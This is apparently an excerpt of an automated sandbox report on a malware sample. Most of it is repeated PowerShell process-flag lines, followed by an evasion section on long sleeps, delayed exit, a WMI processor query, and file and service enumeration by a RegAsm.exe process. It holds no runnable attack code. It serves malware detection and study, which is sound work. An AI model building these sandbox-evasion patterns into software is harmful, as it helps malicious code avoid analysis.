Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0040A6C0 Sleep,ExitProcess,

13_2_0040A6C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

13_2_00412E96

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1600	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1496	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3901	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5871	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 731	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 9251	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_13-41078

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6704	Thread sleep count: 3901 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6404	Thread sleep count: 5871 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6328	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2440	Thread sleep count: 731 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2440	Thread sleep time: -2193000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2440	Thread sleep count: 9251 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2440	Thread sleep time: -27753000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004081F9 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	13_2_004081F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_004072E5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_004072E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407733 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	13_2_00407733
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00414795 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	13_2_00414795
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00440A59 FindFirstFileExA,	13_2_00440A59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00404CF3 FindFirstFileW,FindNextFileW,	13_2_00404CF3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00405C8E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	13_2_00405C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 13_2_00407FDE FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	13_2_00407FDE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_0040511A SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

13_2_0040511A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tEventVmNetworkAdapter',
Source: powershell.exe, 00000006.00000002.1420244282.000001CFD4E8F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 'Remove-NetEventVmNetworkAdapter',
